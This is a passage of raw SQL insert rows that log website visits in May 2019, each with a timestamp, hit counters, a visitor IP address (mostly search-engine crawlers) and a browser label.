69','other'),(418497,1557339740,1,1,0,0,'87.250.224.107','other'),(418498,1557340018,1,1,0,0,'213.180.203.23','other'),(418499,1557340191,1,1,0,0,'95.163.255.97','other'),(418500,1557340946,1,1,0,0,'66.249.66.218','chrome'),(418501,1557341621,1,1,0,0,'146.148.108.110','other'),(418502,1557342367,1,1,0,0,'157.55.39.69','other'),(418503,1557342396,1,1,0,0,'176.120.52.81','chrome'),(418504,1557342602,1,1,0,0,'95.163.255.165','other'),(418505,1557343481,1,1,0,0,'207.46.13.163','other'),(418506,1557343586,1,1,0,0,'157.55.39.69','other'),(418507,1557343592,1,1,0,0,'178.154.171.30','other'),(418508,1557344548,1,1,0,0,'95.108.181.96','other'),(418509,1557344821,1,1,0,0,'5.255.253.25','other'),(418510,1557344916,1,1,0,0,'95.163.255.96','other'),(418511,1557345036,1,1,0,0,'95.163.255.184','other'),(418512,1557345039,1,1,0,0,'95.163.255.164','other'),(418513,1557345168,1,1,0,0,'109.201.154.225','other'),(418514,1557345394,1,1,0,0,'104.130.24.169','other'),(418515,1557345755,2,2,0,0,'66.249.66.220','chrome'),(418516,1557346508,1,1,0,0,'66.249.66.218','chrome'),(418517,1557346706,1,1,0,0,'8.29.198.26','other'),(418518,1557346791,1,1,0,0,'8.29.198.27','other'),(418519,1557346958,1,1,0,0,'178.154.244.21','other'),(418520,1557346960,1,1,0,0,'157.55.39.9','other'),(418521,1557347675,2,2,0,0,'66.249.66.218','chrome'),(418522,1557347690,1,1,0,0,'66.249.66.220','chrome'),(418523,1557347799,1,1,0,0,'66.249.66.132','chrome'),(418524,1557348351,1,1,0,0,'95.108.213.50','other'),(418525,1557348395,1,1,0,0,'141.8.142.162','other'),(418526,1557348489,1,1,0,0,'178.154.171.60','other'),(418527,1557348511,1,1,0,0,'66.249.66.130','chrome'),(418528,1557348662,1,1,0,0,'35.226.138.198','other'),(418529,1557348762,1,1,0,0,'95.163.255.152','other'),(418530,1557348856,1,1,0,0,'95.163.255.193','other'),(418531,1557348950,1,1,0,0,'5.255.253.22','other'),(418532,1557349346,1,1,0,0,'95.163.255.98','other'),(418533,1557349873,1,1,0,0,'91.196.178.43','chrome'),(418534,1557349968,1,1,0,0,'66.249.66.218','chrome'),(418535,1557350303,1,1,0,0,'66.249.66.222','chrome'),(418536,1557350315,1,1,0,0,'66.249.66.128','chrome'),(418537,1557350654,2,2,0,0,'95.163.255.94','other'),(418538,1557350821,1,1,0,0,'95.163.255.171','other'),(418539,1557352583,3,3,0,0,'104.197.30.218','chrome'),(418540,1557352602,3,3,0,0,'34.66.101.12','chrome'),(418541,1557352617,3,3,0,0,'35.202.136.70','chrome'),(418542,1557352631,2,2,0,0,'35.225.7.230','chrome'),(418543,1557352886,1,1,0,0,'95.108.213.4','other'),(418544,1557353174,1,1,0,0,'35.202.173.218','other'),(418545,1557353312,1,1,0,0,'178.154.244.65','other'),(418546,1557353870,1,1,0,0,'79.143.42.99','chrome'),(418547,1557353941,2,2,0,0,'66.249.66.220','chrome'),(418548,1557353984,1,1,0,0,'69.12.72.172','firefox'),(418549,1557355521,1,1,0,0,'66.249.66.222','chrome'),(418550,1557355526,1,1,0,0,'95.163.255.196','other'),(418551,1557355754,1,1,0,0,'66.249.66.218','chrome'),(418552,1557356142,1,1,0,0,'213.180.203.48','other'),(418553,1557356479,1,1,0,0,'95.163.255.92','other'),(418554,1557356734,1,1,0,0,'66.249.66.128','chrome'),(418555,1557356997,1,1,0,0,'95.163.255.190','other'),(418556,1557357043,1,1,0,0,'5.255.253.22','other'),(418557,1557357097,1,1,0,0,'95.163.255.181','other'),(418558,1557357185,1,1,0,0,'95.163.255.179','other'),(418559,1557357270,1,1,0,0,'178.154.244.21','other'),(418560,1557357388,1,1,0,0,'178.154.171.17','other'),(418561,1557357548,1,1,0,0,'8.29.198.25','other'),(418562,1557357626,1,1,0,0,'8.29.198.26','other'),(418563,1557358134,1,1,0,0,'5.255.253.38','other'),(418564,1557359011,1,1,0,0,'95.163.255.162','other'),(418565,1557359279,1,1,0,0,'95.163.255.151','other'),(418566,1557359314,1,1,0,0,'104.155.129.248','other'),(418567,1557359443,1,1,0,0,'13.66.139.0','other'),(418568,1557359696,1,1,0,0,'157.55.39.66','other'),(418569,1557360506,1,1,0,0,'95.163.255.96','other'),(418570,1557360703,1,1,0,0,'95.163.255.173','other'),(418571,1557361323,1,1,0,0,'95.163.255.166','other'),(418572,1557361485,3,3,0,0,'157.55.39.9','other'),(418573,1557361490,4,4,0,0,'157.55.39.66','other'),(418574,1557361495,4,4,0,0,'40.77.167.129','other'),(418575,1557361540,3,3,0,0,'5.45.207.19','other'),(418576,1557361563,1,1,0,0,'141.8.142.103','other'),(418577,1557361841,1,1,0,0,'87.250.224.65','other'),(418578,1557362031,1,1,0,0,'95.163.255.99','other'),(418579,1557362130,1,1,0,0,'95.163.255.186','other'),(418580,1557362324,2,2,0,0,'66.249.66.218','chrome'),(418581,1557362416,1,1,0,0,'95.163.255.97','other'),(418582,1557362726,1,1,0,0,'104.198.211.195','other'),(418583,1557363168,1,1,0,0,'5.45.207.79','other'),(418584,1557363173,1,1,0,0,'5.45.207.19','other'),(418585,1557364195,1,1,0,0,'157.55.39.210','other'),(418586,1557364201,1,1,0,0,'66.249.66.128','chrome'),(418587,1557364294,1,1,0,0,'66.249.66.218','chrome'),(418588,1557364340,1,1,0,0,'62.210.180.164','firefox'),(418589,1557366178,1,1,0,0,'66.249.66.222','chrome'),(418590,1557366510,1,1,0,0,'95.163.255.96','other'),(418591,1557366571,1,1,0,0,'95.163.255.99','other'),(418592,1557367087,1,1,0,0,'95.163.255.175','other'),(418593,1557367318,1,1,0,0,'66.249.66.218','chrome'),(418594,1557367655,1,1,0,0,'95.163.255.194','other'),(418595,1557367658,1,1,0,0,'95.163.255.152','other'),(418596,1557367662,1,1,0,0,'95.163.255.96','other'),(418597,1557367696,1,1,0,0,'95.163.255.97','other'),(418598,1557368144,1,1,0,0,'95.108.181.57','other'),(418599,1557368308,1,1,0,0,'95.163.255.187','other'),(418600,1557368312,1,1,0,0,'95.163.255.191','other'),(418601,1557368391,2,2,0,0,'8.29.198.26','other'),(418602,1557368411,1,1,0,0,'95.163.255.186','other'),(418603,1557368421,1,1,0,0,'5.45.207.80','other'),(418604,1557369210,1,1,0,0,'66.249.66.218','chrome'),(418605,1557369489,1,1,0,0,'181.214.1.157','chrome'),(418606,1557369967,1,1,0,0,'95.163.255.174','other'),(418607,1557370388,1,1,0,0,'95.108.181.83','other'),(418608,1557370520,1,1,0,0,'37.9.113.38','other'),(418609,1557371278,2,2,0,0,'66.249.66.218','chrome'),(418610,1557371411,1,1,0,0,'95.108.181.94','other'),(418611,1557371501,1,1,0,0,'178.154.171.30','other'),(418612,1557371617,1,1,0,0,'93.158.166.7','other'),(418613,1557371655,1,1,0,0,'141.8.183.11','other'),(418614,1557371658,1,1,0,0,'141.8.142.38','other'),(418615,1557371973,1,1,0,0,'213.180.203.53','other'),(418616,1557372012,1,1,0,0,'207.46.13.0','other'),(418617,1557372156,1,1,0,0,'95.163.255.99','other'),(418618,1557372237,1,1,0,0,'40.77.167.83','other'),(418619,1557372346,1,1,0,0,'95.163.255.174','other'),(418620,1557372349,1,1,0,0,'35.238.46.155','other'),(418621,1557372525,1,1,0,0,'66.249.66.220','chrome'),(418622,1557372628,1,1,0,0,'66.249.66.218','chrome'),(418623,1557373450,1,1,0,0,'66.249.66.130','chrome'),(418624,1557373636,1,1,0,0,'66.249.66.220','chrome'),(418625,1557373766,1,1,0,0,'95.163.255.95','other'),(418626,1557374285,2,2,0,0,'52.37.206.70','chrome'),(418627,1557374953,1,1,0,0,'157.55.39.60','other'),(418628,1557374971,1,1,0,0,'5.45.207.76','other'),(418629,1557375015,1,1,0,0,'141.8.142.81','other'),(418630,1557375050,1,1,0,0,'66.249.66.222','chrome'),(418631,1557375076,1,1,0,0,'46.211.42.203','chrome'),(418632,1557375212,1,1,0,0,'66.249.66.218','chrome'),(418633,1557375216,1,1,0,0,'178.154.244.21','other'),(418634,1557375494,1,1,0,0,'95.163.255.171','other'),(418635,1557375687,1,1,0,0,'157.55.39.187','other'),(418636,1557376046,1,1,0,0,'95.163.255.166','other'),(418637,1557376524,1,1,0,0,'13.66.139.0','other'),(418638,1557376531,1,1,0,0,'66.249.66.222','chrome'),(418639,1557376755,1,1,0,0,'66.249.66.218','chrome'),(418640,1557376760,1,1,0,0,'66.249.66.220','chrome'),(418641,1557376851,1,1,0,0,'35.225.83.86','other'),(418642,1557376875,1,1,0,0,'66.249.66.130','chrome'),(418643,1557377233,1,1,0,0,'40.77.167.87','other'),(418644,1557377320,1,1,0,0,'207.46.13.0','other'),(418645,1557378051,1,1,0,0,'46.211.131.240','chrome'),(418646,1557378122,1,1,0,0,'185.234.219.246','chrome'),(418647,1557378202,2,2,0,0,'66.249.66.132','chrome'),(418648,1557378616,1,1,0,0,'46.211.80.10','chrome'),(418649,1557378736,2,2,0,0,'66.249.66.130','chrome'),(418650,1557378760,1,1,0,0,'37.53.41.181','chrome'),(418651,1557378935,1,1,0,0,'31.13.115.3','other'),(418652,1557378957,1,1,0,0,'87.250.224.107','other'),(418653,1557378984,1,1,0,0,'95.163.255.190','other'),(418654,1557378990,2,2,0,0,'178.154.200.8','other'),(418655,1557379064,1,1,0,0,'85.21.233.180','other'),(418656,1557379241,1,1,0,0,'8.29.198.25','other'),(418657,1557379320,1,1,0,0,'8.29.198.27','other'),(418658,1557379453,1,1,0,0,'185.117.215.9','other'),(418659,1557379630,1,1,0,0,'95.163.255.98','other'),(418660,1557379650,1,1,0,0,'46.133.150.245','chrome'),(418661,1557380009,1,1,0,0,'66.249.66.220','chrome'),(418662,1557380055,1,1,0,0,'157.55.39.187','other'),(418663,1557380363,1,1,0,0,'91.201.225.188','firefox'),(418664,1557380508,1,1,0,0,'178.158.247.213','chrome'),(418665,1557380999,1,1,0,0,'66.249.66.218','chrome'),(418666,1557381135,1,1,0,0,'157.55.39.147','other'),(418667,1557381338,1,1,0,0,'95.163.255.186','other'),(418668,1557381662,1,1,0,0,'31.202.22.150','other'),(418669,1557381676,1,1,0,0,'66.249.66.128','chrome'),(418670,1557382424,1,1,0,0,'66.249.66.218','chrome'),(418671,1557382784,1,1,0,0,'66.249.66.128','chrome'),(418672,1557382874,1,1,0,0,'178.154.244.21','other'),(418673,1557382939,1,1,0,0,'77.93.54.44','chrome'),(418674,1557383066,1,1,0,0,'178.154.171.69','other'),(418675,1557383110,1,1,0,0,'157.55.39.187','other'),(418676,1557383116,1,1,0,0,'66.249.66.220','chrome'),(418677,1557383484,1,1,0,0,'157.55.39.211','other'),(418678,1557383843,1,1,0,0,'141.8.142.81','other'),(418679,1557384139,2,2,0,0,'95.163.255.167','other'),(418680,1557384778,1,1,0,0,'178.154.171.69','other'),(418681,1557385009,1,1,0,0,'46.211.205.72','other'),(418682,1557385311,1,1,0,0,'95.163.255.156','other'),(418683,1557385314,1,1,0,0,'95.163.255.174','other'),(418684,1557385545,1,1,0,0,'176.38.71.23','other'),(418685,1557385737,1,1,0,0,'46.211.55.151','other'),(418686,1557386079,1,1,0,0,'46.211.119.233','chrome'),(418687,1557386103,1,1,0,0,'66.249.66.218','chrome'),(418688,1557386121,1,1,0,0,'157.55.39.187','other'),(418689,1557386150,1,1,0,0,'46.211.205.72','other'),(418690,1557386733,1,1,0,0,'178.154.171.69','other'),(418691,1557386740,1,1,0,0,'213.180.203.23','other'),(418692,1557386758,1,1,0,0,'46.118.33.120','chrome'),(418693,1557387105,1,1,0,0,'157.55.39.187','other'),(418694,1557387172,1,1,0,0,'141.8.183.11','other'),(418695,1557387176,1,1,0,0,'87.250.224.65','other'),(418696,1557387213,1,1,0,0,'46.211.87.194','chrome'),(418697,1557387533,1,1,0,0,'66.249.66.218','chrome'),(418698,1557387545,1,1,0,0,'94.232.210.166','chrome'),(418699,1557387993,1,1,0,0,'193.238.39.10','chrome'),(418700,1557388156,1,1,0,0,'31.148.171.188','chrome'),(418701,1557388780,1,1,0,0,'66.249.66.132','chrome'),(418702,1557388791,1,1,0,0,'91.196.178.184','chrome'),(418703,1557389088,1,1,0,0,'141.8.183.11','other'),(418704,1557389146,1,1,0,0,'95.163.255.96','other'),(418705,1557389224,1,1,0,0,'46.211.227.214','chrome'),(418706,1557389243,1,1,0,0,'212.164.64.16','chrome'),(418707,1557389280,2,2,0,0,'95.163.255.94','other'),(418708,1557390102,1,1,0,0,'8.29.198.27','other'),(418709,1557390169,1,1,0,0,'8.29.198.25','other'),(418710,1557390778,1,1,0,0,'5.1.27.95','chrome'),(418711,1557390889,1,1,0,0,'95.163.255.94','other'),(418712,1557390943,2,2,0,0,'66.249.66.222','chrome'),(418713,1557390980,1,1,0,0,'95.163.255.92','other'),(418714,1557391240,2,2,0,0,'66.249.66.220','chrome'),(418715,1557391455,1,1,0,0,'5.45.207.79','other'),(418716,1557391474,1,1,0,0,'178.255.215.94','other'),(418717,1557392419,1,1,0,0,'66.249.66.132','chrome'),(418718,1557393024,2,2,0,0,'66.249.66.218','chrome'),(418719,1557393042,1,1,0,0,'95.163.255.170','other'),(418720,1557393604,1,1,0,0,'66.249.66.222','chrome'),(418721,1557393722,1,1,0,0,'157.55.39.147','other'),(418722,1557394018,1,1,0,0,'185.11.29.8','chrome'),(418723,1557394724,2,2,0,0,'66.249.66.220','chrome'),(418724,1557395101,1,1,0,0,'77.120.67.54','chrome'),(418725,1557395114,1,1,0,0,'194.177.26.67','chrome'),(418726,1557395801,1,1,0,0,'178.154.244.21','other'),(418727,1557395886,1,1,0,0,'213.180.203.17','other'),(418728,1557395961,3,3,0,0,'104.197.186.43','chrome'),(418729,1557396002,1,1,0,0,'213.180.203.53','other'),(418730,1557396018,3,3,0,0,'35.225.30.38','chrome'),(418731,1557396033,3,3,0,0,'35.222.32.203','chrome'),(418732,1557396045,2,2,0,0,'35.238.79.211','chrome'),(418734,1557396071,3,3,0,0,'34.66.84.231','chrome'),(418735,1557396086,3,3,0,0,'35.232.113.131','chrome'),(418736,1557396134,2,2,0,0,'95.163.255.99','other'),(418737,1557396989,1,1,0,0,'46.211.64.187','chrome'),(418738,1557397314,1,1,0,0,'157.55.39.211','other'),(418739,1557397768,1,1,0,0,'66.249.66.128','chrome'),(418740,1557397817,1,1,0,0,'109.74.154.72','chrome'),(418741,1557398203,1,1,0,0,'66.249.66.220','chrome'),(418742,1557398569,1,1,0,0,'66.249.66.218','chrome'),(418743,1557398721,1,1,0,0,'95.163.255.189','other'),(418744,1557399302,1,1,0,0,'31.13.115.7','other'),(418745,1557399324,1,1,0,0,'46.133.205.142','chrome'),(418746,1557399556,1,1,0,0,'157.55.39.247','other'),(418747,1557399559,1,1,0,0,'95.163.255.186','other'),(418748,1557399591,1,1,0,0,'5.45.207.79','other'),(418749,1557399752,1,1,0,0,'5.45.207.76','other'),(418750,1557399967,1,1,0,0,'46.211.65.114','chrome'),(418751,1557400102,1,1,0,0,'93.74.16.239','chrome'),(418752,1557400147,1,1,0,0,'95.163.255.194','other'),(418753,1557400305,1,1,0,0,'87.250.224.47','other'),(418754,1557400307,1,1,0,0,'178.154.200.8','other'),(418755,1557400371,1,1,0,0,'95.163.255.92','other'),(418756,1557400480,1,1,0,0,'66.249.66.220','chrome'),(418757,1557400585,1,1,0,0,'87.250.224.64','other'),(418758,1557400873,1,1,0,0,'5.58.35.210','chrome'),(418759,1557400956,1,1,0,0,'8.29.198.26','other'),(418760,1557401015,1,1,0,0,'8.29.198.27','other'),(418761,1557401076,1,1,0,0,'95.163.255.178','other'),(418762,1557401643,1,1,0,0,'157.55.39.147','other'),(418763,1557403358,1,1,0,0,'66.249.66.132','chrome'),(418764,1557403520,1,1,0,0,'5.45.207.79','other'),(418765,1557403538,1,1,0,0,'87.250.224.118','other'),(418766,1557403872,2,2,0,0,'66.249.66.128','chrome'),(418767,1557404249,1,1,0,0,'157.55.39.211','other'),(418768,1557405063,1,1,0,0,'77.120.67.54','chrome'),(418769,1557405452,1,1,0,0,'66.249.66.220','chrome'),(418770,1557405798,1,1,0,0,'66.102.9.62','chrome'),(418771,1557406056,1,1,0,0,'95.163.255.96','other'),(418772,1557406177,1,1,0,0,'141.8.142.81','other'),(418773,1557406341,1,1,0,0,'157.55.39.50','other'),(418774,1557406716,1,1,0,0,'66.249.66.222','chrome'),(418775,1557406862,1,1,0,0,'213.180.203.61','other'),(418776,1557407187,1,1,0,0,'95.163.255.187','other'),(418777,1557407210,1,1,0,0,'37.9.113.148','other'),(418778,1557407693,1,1,0,0,'213.180.203.48','other'),(418779,1557407902,1,1,0,0,'95.163.255.94','other'),(418780,1557408221,1,1,0,0,'46.211.98.210','chrome'),(418781,1557408369,1,1,0,0,'66.249.66.130','chrome'),(418782,1557408429,1,1,0,0,'95.163.255.151','other'),(418783,1557408710,3,3,0,0,'66.249.66.218','chrome'),(418784,1557408947,1,1,0,0,'66.249.66.132','chrome'),(418785,1557409151,1,1,0,0,'46.211.98.210','chrome'),(418786,1557409181,1,1,0,0,'40.77.167.46','other'),(418787,1557409188,1,1,0,0,'157.55.39.50','other'),(418788,1557409303,2,2,0,0,'66.249.66.222','chrome'),(418789,1557409411,1,1,0,0,'178.154.171.69','other'),(418790,1557409515,1,1,0,0,'178.154.171.30','other'),(418791,1557410007,1,1,0,0,'46.133.209.51','chrome'),(418792,1557410022,1,1,0,0,'87.250.224.99','other'),(418793,1557410058,1,1,0,0,'141.8.142.81','other'),(418794,1557410137,1,1,0,0,'95.163.255.155','other'),(418795,1557410205,1,1,0,0,'213.180.203.61','other'),(418796,1557410758,1,1,0,0,'213.180.203.23','other'),(418797,1557411027,1,1,0,0,'66.249.66.218','chrome'),(418798,1557411161,1,1,0,0,'95.163.255.183','other'),(418799,1557411298,1,1,0,0,'46.33.49.91','chrome'),(418800,1557411847,2,2,0,0,'8.29.198.26','other'),(418801,1557412176,2,2,0,0,'66.249.66.218','chrome'),(418802,1557412517,1,1,0,0,'31.13.115.19','other'),(418803,1557412685,1,1,0,0,'95.108.213.50','other'),(418804,1557412704,2,2,0,0,'212.90.177.68','chrome'),(418805,1557412786,1,1,0,0,'178.154.171.30','other'),(418806,1557413804,1,1,0,0,'66.249.66.130','chrome'),(418807,1557413893,1,1,0,0,'95.163.255.92','other'),(418808,1557413896,1,1,0,0,'95.163.255.94','other'),(418809,1557413971,1,1,0,0,'95.163.255.95','other'),(418810,1557414160,1,1,0,0,'157.55.39.50','other'),(418811,1557414346,1,1,0,0,'95.163.255.193','other'),(418812,1557414348,1,1,0,0,'95.163.255.192','other'),(418813,1557414711,1,1,0,0,'157.55.39.105','other'),(418814,1557414728,1,1,0,0,'66.249.66.218','chrome'),(418815,1557415169,1,1,0,0,'95.163.255.177','other'),(418816,1557415315,1,1,0,0,'188.163.82.198','chrome'),(418817,1557415623,1,1,0,0,'66.249.66.222','chrome'),(418818,1557416070,1,1,0,0,'95.163.255.174','other'),(418819,1557416159,2,2,0,0,'95.163.255.182','other'),(418820,1557416169,1,1,0,0,'157.55.39.50','other'),(418821,1557416195,1,1,0,0,'66.249.66.128','chrome'),(418822,1557416540,1,1,0,0,'157.55.39.9','other'),(418823,1557416780,1,1,0,0,'157.55.39.105','other'),(418824,1557417085,1,1,0,0,'66.249.66.218','chrome'),(418825,1557417565,1,1,0,0,'66.249.66.132','chrome'),(418826,1557417779,1,1,0,0,'66.249.66.128','chrome'),(418827,1557417830,1,1,0,0,'93.158.166.7','other'),(418828,1557418065,1,1,0,0,'178.154.171.69','other'),(418829,1557418726,1,1,0,0,'66.249.66.130','chrome'),(418830,1557418789,1,1,0,0,'66.249.66.128','chrome'),(418831,1557418823,1,1,0,0,'157.55.39.2','other'),(418832,1557418958,1,1,0,0,'178.154.171.17','other'),(418833,1557419274,2,2,0,0,'95.163.255.98','other'),(418834,1557419300,1,1,0,0,'5.188.45.160','chrome'),(418835,1557419512,1,1,0,0,'87.250.224.64','other'),(418836,1557419753,1,1,0,0,'212.90.60.194','chrome'),(418837,1557419834,1,1,0,0,'157.55.39.105','other'),(418838,1557419964,1,1,0,0,'178.154.200.8','other'),(418839,1557420822,1,1,0,0,'66.102.9.62','chrome'),(418840,1557422098,1,1,0,0,'66.249.66.222','chrome'),(418841,1557422319,1,1,0,0,'157.55.39.50','other'),(418842,1557422702,1,1,0,0,'8.29.198.26','other'),(418843,1557422737,1,1,0,0,'8.29.198.25','other'),(418844,1557422855,1,1,0,0,'95.163.255.97','other'),(418845,1557422948,1,1,0,0,'178.154.171.30','other'),(418846,1557423238,1,1,0,0,'157.55.39.111','other'),(418847,1557423588,1,1,0,0,'91.209.11.236','other'),(418848,1557423761,2,2,0,0,'66.249.66.220','chrome'),(418849,1557423994,1,1,0,0,'157.55.39.2','other'),(418850,1557424721,1,1,0,0,'157.55.39.190','other'),(418851,1557425015,2,2,0,0,'66.249.66.132','chrome'),(418852,1557425137,3,3,0,0,'66.249.66.220','chrome'),(418853,1557425265,1,1,0,0,'95.163.255.151','other'),(418854,1557425374,1,1,0,0,'66.249.66.218','chrome'),(418855,1557425673,2,2,0,0,'66.249.66.222','chrome'),(418856,1557425762,1,1,0,0,'178.154.171.30','other'),(418857,1557426052,1,1,0,0,'157.55.39.189','other'),(418858,1557426809,1,1,0,0,'66.249.66.218','chrome'),(418859,1557426937,1,1,0,0,'66.249.66.130','chrome'),(418860,1557427023,2,2,0,0,'66.249.66.222','chrome'),(418861,1557427027,1,1,0,0,'157.55.39.165','other'),(418862,1557427194,1,1,0,0,'95.163.255.159','other'),(418863,1557427197,1,1,0,0,'95.163.255.184','other'),(418864,1557427395,1,1,0,0,'157.55.39.190','other'),(418865,1557427806,1,1,0,0,'95.163.255.167','other'),(418866,1557428041,2,2,0,0,'157.55.39.189','other'),(418867,1557428197,1,1,0,0,'104.148.64.26','chrome'),(418868,1557428964,1,1,0,0,'157.55.39.189','other'),(418869,1557429045,1,1,0,0,'157.55.39.2','other'),(418870,1557429498,2,2,0,0,'157.55.39.190','other'),(418871,1557429907,1,1,0,0,'37.9.113.38','other'),(418872,1557430045,1,1,0,0,'95.163.255.98','other'),(418873,1557430530,1,1,0,0,'5.255.253.16','other'),(418874,1557430576,1,1,0,0,'157.55.39.189','other'),(418875,1557430694,1,1,0,0,'95.163.255.181','other'),(418876,1557430708,1,1,0,0,'95.163.255.153','other'),(418877,1557430800,1,1,0,0,'95.163.255.171','other'),(418878,1557430990,1,1,0,0,'66.249.66.218','chrome'),(418879,1557431740,1,1,0,0,'178.154.244.21','other'),(418880,1557431799,1,1,0,0,'157.55.39.2','other'),(418881,1557432261,1,1,0,0,'141.8.183.11','other'),(418882,1557433243,1,1,0,0,'95.163.255.196','other'),(418883,1557433345,1,1,0,0,'95.163.255.171','other'),(418884,1557433487,2,2,0,0,'207.46.13.150','other'),(418885,1557433534,1,1,0,0,'66.249.66.222','chrome'),(418886,1557433569,1,1,0,0,'8.29.198.27','other'),(418887,1557433599,1,1,0,0,'8.29.198.25','other'),(418888,1557434038,1,1,0,0,'66.249.66.220','chrome'),(418889,1557435057,1,1,0,0,'66.249.66.220','chrome'),(418890,1557436074,1,1,0,0,'95.163.255.95','other'),(418891,1557436157,1,1,0,0,'95.163.255.97','other'),(418892,1557436215,1,1,0,0,'178.154.171.17','other'),(418893,1557436257,1,1,0,0,'178.154.244.21','other'),(418894,1557436313,1,1,0,0,'37.9.113.148','other'),(418895,1557436344,1,1,0,0,'178.154.171.69','other'),(418896,1557436392,1,1,0,0,'213.180.203.17','other'),(418897,1557436591,1,1,0,0,'66.249.66.222','chrome'),(418898,1557437031,1,0,1,0,'66.249.66.218',''),(418899,1557437659,2,2,0,0,'157.55.39.217','other'),(418900,1557438639,1,1,0,0,'66.249.66.220','chrome'),(418901,1557438707,2,2,0,0,'157.55.39.217','other'),(418902,1557439058,1,1,0,0,'95.163.255.170','other'),(418903,1557439164,3,3,0,0,'35.225.0.165','chrome'),(418904,1557439222,3,3,0,0,'35.232.47.176','chrome'),(418905,1557439226,1,1,0,0,'95.163.255.179','other'),(418906,1557439236,2,2,0,0,'35.238.43.7','chrome'),(418908,1557439249,3,3,0,0,'35.225.59.193','chrome'),(418909,1557439261,3,3,0,0,'35.226.22.94','chrome'),(418910,1557439664,1,1,0,0,'95.163.255.97','other'),(418911,1557439993,1,1,0,0,'207.46.13.150','other'),(418912,1557440009,3,3,0,0,'178.154.244.21','other'),(418913,1557440014,1,1,0,0,'66.249.66.220','chrome'),(418914,1557440157,1,1,0,0,'87.250.224.118','other'),(418915,1557440507,1,1,0,0,'37.9.113.38','other'),(418916,1557440510,1,1,0,0,'178.154.171.27','other'),(418917,1557440898,2,2,0,0,'66.249.66.130','chrome'),(418918,1557441011,1,1,0,0,'66.249.66.220','chrome'),(418919,1557441600,1,1,0,0,'66.249.66.222','chrome'),(418920,1557441674,1,1,0,0,'95.163.255.181','other'),(418921,1557442384,1,1,0,0,'95.163.255.186','other'),(418922,1557442467,1,1,0,0,'95.163.255.174','other'),(418923,1557442538,1,1,0,0,'157.55.39.165','other'),(418924,1557442541,1,1,0,0,'95.163.255.155','other'),(418925,1557442714,1,1,0,0,'66.249.66.130','chrome'),(418926,1557442747,1,1,0,0,'69.12.72.176','firefox'),(418927,1557443441,1,1,0,0,'157.55.39.139','other'),(418928,1557443519,1,1,0,0,'66.249.66.222','chrome'),(418929,1557443978,2,2,0,0,'178.154.244.21','other'),(418930,1557444139,1,1,0,0,'87.250.224.107','other'),(418931,1557444419,2,2,0,0,'8.29.198.27','other'),(418932,1557444467,1,1,0,0,'178.154.244.11','other'),(418933,1557444735,1,1,0,0,'87.250.224.64','other'),(418934,1557445148,1,1,0,0,'66.249.66.220','chrome'),(418935,1557445796,1,1,0,0,'66.249.66.128','chrome'),(418936,1557445967,1,1,0,0,'35.239.122.65','other'),(418937,1557446328,1,1,0,0,'66.249.66.220','chrome'),(418938,1557446409,1,1,0,0,'66.249.66.222','chrome'),(418939,1557446685,1,1,0,0,'157.55.39.217','other'),(418940,1557447650,1,1,0,0,'66.249.66.132','chrome'),(418941,1557447896,1,1,0,0,'66.249.66.218','chrome'),(418942,1557447901,1,1,0,0,'66.249.66.222','chrome'),(418943,1557447990,1,1,0,0,'87.250.224.118','other'),(418944,1557448007,1,1,0,0,'95.108.213.50','other'),(418945,1557448009,1,1,0,0,'5.45.207.8','other'),(418946,1557448096,1,1,0,0,'87.250.224.64','other'),(418947,1557448196,1,1,0,0,'87.250.224.99','other'),(418948,1557448216,1,1,0,0,'178.154.171.69','other'),(418949,1557448293,1,1,0,0,'141.8.142.65','other'),(418950,1557448808,2,2,0,0,'66.249.66.218','chrome'),(418951,1557449146,1,1,0,0,'35.238.164.235','other'),(418952,1557450180,1,1,0,0,'157.55.39.85','other'),(418953,1557450392,1,1,0,0,'178.154.244.11','other'),(418954,1557450747,1,1,0,0,'157.55.39.217','other'),(418955,1557450969,1,1,0,0,'141.8.183.11','other'),(418956,1557451102,1,1,0,0,'157.55.39.139','other'),(418957,1557451130,1,1,0,0,'66.249.66.132','chrome'),(418958,1557452093,1,1,0,0,'95.108.213.50','other'),(418959,1557452993,1,1,0,0,'66.249.66.220','chrome'),(418960,1557453146,1,1,0,0,'207.46.13.166','other'),(418961,1557453568,1,1,0,0,'95.163.255.171','other'),(418962,1557454014,1,1,0,0,'66.249.66.128','chrome'),(418963,1557454715,1,1,0,0,'157.55.39.139','other'),(418964,1557454787,1,1,0,0,'37.9.113.38','other'),(418965,1557455275,2,2,0,0,'8.29.198.27','other'),(418966,1557455585,1,1,0,0,'66.249.66.128','chrome'),(418967,1557455687,1,1,0,0,'66.249.66.220','chrome'),(418968,1557455959,2,2,0,0,'66.249.66.222','chrome'),(418969,1557456234,2,2,0,0,'66.249.66.218','chrome'),(418970,1557456252,1,1,0,0,'157.55.39.139','other'),(418971,1557456399,2,2,0,0,'52.40.198.157','chrome'),(418972,1557458062,1,1,0,0,'178.154.200.8','other'),(418973,1557458111,1,1,0,0,'157.55.39.85','other'),(418974,1557458133,1,1,0,0,'178.154.171.30','other'),(418975,1557459083,1,1,0,0,'93.158.166.7','other'),(418976,1557459138,1,1,0,0,'17.58.98.62','other'),(418977,1557459577,1,1,0,0,'95.163.255.93','other'),(418978,1557459964,1,1,0,0,'213.180.203.53','other'),(418979,1557459982,1,1,0,0,'95.163.255.153','other'),(418980,1557459996,1,1,0,0,'5.255.253.22','other'),(418981,1557460194,1,1,0,0,'95.163.255.178','other'),(418982,1557460196,1,1,0,0,'95.163.255.164','other'),(418983,1557460408,1,1,0,0,'207.46.13.127','other'),(418984,1557460860,1,1,0,0,'66.249.66.218','chrome'),(418985,1557461328,2,2,0,0,'207.46.13.98','other'),(418986,1557461332,1,1,0,0,'157.55.39.85','other'),(418987,1557461438,1,1,0,0,'66.249.66.130','chrome'),(418988,1557461473,1,1,0,0,'157.55.39.179','other'),(418989,1557462456,1,1,0,0,'207.46.13.98','other'),(418990,1557462538,1,1,0,0,'157.55.39.179','other'),(418991,1557462802,1,1,0,0,'66.249.66.132','chrome'),(418992,1557462895,1,1,0,0,'157.55.39.85','other'),(418993,1557463454,1,1,0,0,'66.249.66.218','chrome'),(418994,1557463969,1,1,0,0,'87.250.224.99','other'),(418995,1557463972,1,1,0,0,'5.45.207.76','other'),(418996,1557464569,1,1,0,0,'207.46.13.193','other'),(418997,1557464667,1,1,0,0,'66.249.66.218','chrome'),(418998,1557465404,1,1,0,0,'194.60.255.248','chrome'),(418999,1557465507,1,1,0,0,'95.163.255.172','other'),(419000,1557465853,3,3,0,0,'91.196.178.85','chrome'),(419001,1557465905,1,1,0,0,'178.175.135.99','other'),(419002,1557466125,1,1,0,0,'8.29.198.25','other'),(419003,1557466140,1,1,0,0,'8.29.198.